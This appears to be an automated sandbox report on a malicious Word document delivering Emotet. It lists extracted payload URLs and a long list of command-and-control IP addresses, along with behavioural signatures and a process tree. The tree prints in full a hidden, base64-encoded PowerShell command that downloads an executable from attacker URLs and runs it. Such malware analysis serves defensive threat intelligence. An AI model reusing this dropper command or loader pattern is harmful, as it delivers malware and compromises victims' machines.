Analysis
-
max time kernel
30s -
resource
win10v191014 -
submitted
16-01-2020 13:38
General
Malware Config
Extracted
http://nfaagro.com/web_map/FF/
http://blog.arquitetofabiopalheta.com/cgi-bin/vr1tm/
http://ecrib.e-lyfe.com/21rqvsb/XLkpTvt/
http://www.moestlstudios.com/error/kx8/
http://www.loyss.com/wp-content/uploads/fnf8/
Extracted
emotet
24.196.49.98:80
93.147.141.5:443
72.189.57.105:80
91.250.96.22:8080
37.187.72.193:8080
104.131.44.150:8080
167.71.10.37:8080
27.109.153.201:8090
105.247.123.133:8080
190.12.119.180:443
120.151.135.224:80
221.165.123.72:80
103.86.49.11:8080
178.237.139.83:8080
5.32.55.214:80
95.213.236.64:8080
189.203.177.41:443
78.24.219.147:8080
190.117.226.104:80
73.11.153.178:8080
195.244.215.206:80
192.241.255.77:8080
24.105.202.216:443
50.116.86.205:8080
41.60.200.34:80
70.175.171.251:80
182.176.132.213:8090
45.51.40.140:80
201.184.105.242:443
47.180.91.213:80
159.65.25.128:8080
173.21.26.90:80
79.159.249.152:80
66.34.201.20:7080
62.75.187.192:8080
180.92.239.110:8080
178.153.176.124:80
115.95.6.218:443
24.94.237.248:80
181.143.126.170:80
210.6.85.121:80
197.89.27.26:8080
98.30.113.161:80
201.173.217.124:443
98.174.166.205:80
91.205.215.66:443
2.237.76.249:80
92.222.216.44:8080
209.97.168.52:8080
200.21.90.5:443
66.7.242.50:8080
5.154.58.24:80
31.31.77.83:443
59.103.164.174:80
37.157.194.134:443
110.36.217.66:8080
46.105.131.87:80
181.126.70.117:80
209.146.22.34:443
160.16.215.66:8080
5.196.74.210:8080
190.146.205.227:8080
169.239.182.217:8080
190.220.19.82:443
121.88.5.176:443
104.131.11.150:8080
190.53.135.159:21
200.116.145.225:443
47.6.15.79:80
87.106.139.101:8080
91.73.197.90:80
24.164.79.147:8080
139.130.242.43:80
62.75.141.82:80
58.171.42.66:8080
62.138.26.28:8080
211.63.71.72:8080
190.117.126.169:80
47.6.15.79:443
78.189.180.107:80
173.66.96.135:80
108.191.2.72:80
47.156.70.145:80
183.102.238.69:465
46.105.131.69:443
64.53.242.181:8080
78.186.5.109:443
205.185.117.108:8080
201.229.45.222:8080
209.141.54.221:8080
110.142.38.16:80
110.143.84.202:80
70.169.53.234:80
98.156.206.153:80
85.67.10.190:80
78.142.114.69:80
179.13.185.19:80
120.150.246.241:80
223.197.185.60:80
139.130.241.252:443
88.249.120.205:80
206.81.10.215:8080
31.172.240.91:8080
206.189.112.148:8080
72.186.137.156:80
104.236.246.93:8080
186.86.247.171:443
45.33.49.124:443
105.27.155.182:80
176.106.183.253:8080
177.239.160.121:80
95.128.43.213:8080
47.153.183.211:80
149.202.153.252:8080
190.55.181.54:443
87.106.136.232:8080
37.139.21.175:8080
60.231.217.199:8080
108.179.206.219:8080
87.230.19.21:8080
70.46.247.81:80
217.160.182.191:8080
188.0.135.237:80
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4868 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4868 WINWORD.EXE 4524 128.exe 4688 128.exe 3820 zapiplk.exe 4320 zapiplk.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4476 5088 Powershell.exe 73 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4476 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 4476 Powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 4476 wrote to memory of 4524 4476 Powershell.exe 80 PID 4524 wrote to memory of 4688 4524 128.exe 81 PID 3820 wrote to memory of 4320 3820 zapiplk.exe 83 -
Executes dropped EXE 4 IoCs
pid Process 4524 128.exe 4688 128.exe 3820 zapiplk.exe 4320 zapiplk.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
pid Process 4688 128.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Drops file in System32 directory 1 IoCs
description ioc Process File renamed C:\Users\Admin\128.exe => C:\Windows\SysWOW64\zapiplk.exe 128.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ee6a68655969f365cab1a11da6cc630328b88f132adea746561ca8f6102d5199.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Enumerates system info in registry
- Checks processor information in registry
PID:4868
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABJAG4AbwByAGIAegBlAGoAbwBzAGMAcwA9ACcAWQB6AGYAZwBwAHkAbgBzAHkAJwA7ACQATQB6AGgAZAB6AHgAYgB6AGcAZQBkAGoAIAA9ACAAJwAxADIAOAAnADsAJABCAGUAdABrAHoAcQBhAHQAPQAnAEwAagBxAHMAcQBkAGwAbwBiAGgAbwB2AGIAJwA7ACQAQQBwAG4AYgBsAGEAYgByAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABNAHoAaABkAHoAeABiAHoAZwBlAGQAagArACcALgBlAHgAZQAnADsAJABYAHQAcQBnAHAAcABsAHkAegB5AHoAcABkAD0AJwBSAHEAbgB6AG8AdwBxAHcAaABrACcAOwAkAFMAdgBrAGEAZABpAGsAYwA9ACYAKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBlAHQALgBXAGUAYgBDAEwAaQBFAE4AVAA7ACQASAB3AGgAagBhAGgAeQBpAD0AJwBoAHQAdABwADoALwAvAG4AZgBhAGEAZwByAG8ALgBjAG8AbQAvAHcAZQBiAF8AbQBhAHAALwBGAEYALwAqAGgAdAB0AHAAOgAvAC8AYgBsAG8AZwAuAGEAcgBxAHUAaQB0AGUAdABvAGYAYQBiAGkAbwBwAGEAbABoAGUAdABhAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AdgByADEAdABtAC8AKgBoAHQAdABwADoALwAvAGUAYwByAGkAYgAuAGUALQBsAHkAZgBlAC4AYwBvAG0ALwAyADEAcgBxAHYAcwBiAC8AWABMAGsAcABUAHYAdAAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AbwBlAHMAdABsAHMAdAB1AGQAaQBvAHMALgBjAG8AbQAvAGUAcgByAG8AcgAvAGsAeAA4AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbABvAHkAcwBzAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvAGYAbgBmADgALwAnAC4AIgBzAHAAYABsAGkAdAAiACgAJwAqACcAKQA7ACQAQwBsAG4AZgBkAG0AbQBjAHgAawA9ACcASgB6AGwAcQB1AHIAbgBoACcAOwBmAG8AcgBlAGEAYwBoACgAJABTAGYAZwBzAHoAZABlAGEAIABpAG4AIAAkAEgAdwBoAGoAYQBoAHkAaQApAHsAdAByAHkAewAkAFMAdgBrAGEAZABpAGsAYwAuACIARABvAGAAdwBuAGAAbABPAGEAZABgAEYAaQBsAGUAIgAoACQAUwBmAGcAcwB6AGQAZQBhACwAIAAkAEEAcABuAGIAbABhAGIAcgApADsAJABRAHkAaQBiAHQAYwBnAHcAagB3AGoAPQAnAE0AbQBzAHYAZAByAHEAbwBnAGQAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdABlACcAKwAnAG0AJwApACAAJABBAHAAbgBiAGwAYQBiAHIAKQAuACIATABlAG4AYABHAGAAVABIACIAIAAtAGcAZQAgADIANwA1ADcAMwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAFIAVAAiACgAJABBAHAAbgBiAGwAYQBiAHIAKQA7ACQASwB6AGMAcAB3AHkAbgBtAHYAbwB4AD0AJwBKAHYAYQBiAHEAdQBkAHEAeQBlAGMAdwAnADsAYgByAGUAYQBrADsAJABFAGIAagB2AHkAawBlAHIAZwB1AHQAPQAnAFMAeAByAHgAdgBzAGoAaAB1AG4AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUABuAHkAbQB2AHoAcwBtAGkAaQBrAD0AJwBZAHMAbwBzAG8AZwBoAHEAagBrAHQAZwAnAA==1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Users\Admin\128.exe"C:\Users\Admin\128.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:4524 -
C:\Users\Admin\128.exe--3a4cf8953⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
PID:4688
-
-
-
C:\Windows\SysWOW64\zapiplk.exe"C:\Windows\SysWOW64\zapiplk.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:3820 -
C:\Windows\SysWOW64\zapiplk.exe--e14274452⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
PID:4320
-